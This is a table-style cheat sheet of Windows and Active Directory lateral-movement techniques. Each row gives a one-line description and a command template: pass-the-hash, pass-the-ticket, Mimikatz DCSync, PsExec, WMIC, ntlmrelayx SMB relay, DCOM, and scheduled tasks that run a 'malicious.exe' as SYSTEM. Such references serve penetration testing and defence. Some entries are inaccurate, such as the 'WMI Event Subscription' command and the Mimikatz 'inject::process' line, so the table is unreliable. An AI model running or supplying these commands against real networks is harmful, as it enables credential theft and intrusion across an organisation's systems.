| Pass-the-Hash (PtH) |
Using an extracted NTLM hash to authenticate as a user without needing their plaintext password. |
pth-winexe -U <domain>/<user>%<hash> //<target_ip> cmd |
| Pass-the-Ticket (PtT) |
Using a stolen Kerberos ticket to authenticate as a user. |
Invoke-Mimikatz -Command '"kerberos::ptt <ticket>"' |
| Over-Pass-the-Hash (Pass-the-Key) |
Using an NTLM hash to request a Kerberos ticket for authentication. |
mimikatz.exe "sekurlsa::pth /user:<user> /domain:<domain> /aes128:<hash> /aes256:<hash>" |
| Remote Services (PsExec, WMI, WinRM) |
Executing commands on remote systems using tools like PsExec, WMI, or WinRM. |
psexec.exe \\<target_ip> -u <user> -p <password> cmd |
| Remote Desktop Protocol (RDP) |
Connecting to a remote system's desktop to control it as if locally logged in. |
mstsc /v:<target_ip> |
| WMIC (Windows Management Instrumentation Command-line) |
Using WMI to execute commands on remote systems. |
wmic /node:<target_ip> process call create "cmd.exe" |
| Windows Remote Management (WinRM) |
Using the WinRM service to execute commands or scripts on a remote machine. |
evil-winrm -i <target_ip> -u <user> -H <hash> |
| SMB (Server Message Block) Relay |
Relaying SMB authentication to execute commands on another machine. |
ntlmrelayx.py -t smb://<target_ip> |
| DCOM (Distributed Component Object Model) |
Using DCOM objects to execute commands on remote systems. |
dcomexec.py <domain>/<user>:<password>@<target_ip> |
| PowerShell Remoting |
Executing PowerShell commands on remote systems using remoting features. |
Enter-PSSession -ComputerName <target_ip> -Credential <user> |
| Scheduled Tasks |
Creating or modifying scheduled tasks on a remote system to execute code with elevated privileges. |
schtasks /create /tn "TaskName" /tr "C:\malicious.exe" /sc onstart /ru SYSTEM /S <target_ip> |
| WMI Event Subscription |
Creating WMI event subscriptions to persist code execution on a remote system. |
Invoke-WmiMethod -Class Win32_Process -Name Create -ArgumentList "C:\malicious.exe" -ComputerName <target_ip> |
| Lateral Tool Transfer |
Moving tools or scripts to remote systems to facilitate further exploitation. |
copy C:\tool.exe \\<target_ip>\C$\Windows\Temp\ |
| DLL Injection |
Injecting malicious code into the memory of a running process on a remote system. |
mimikatz.exe "privilege::debug" "inject::process" "C:\malicious.dll" |
| Active Directory Replication |
Using the Directory Replication Service (DRS) to replicate AD data and move laterally within the domain. |
Invoke-Mimikatz -Command '"dcsync /user:<user>"' |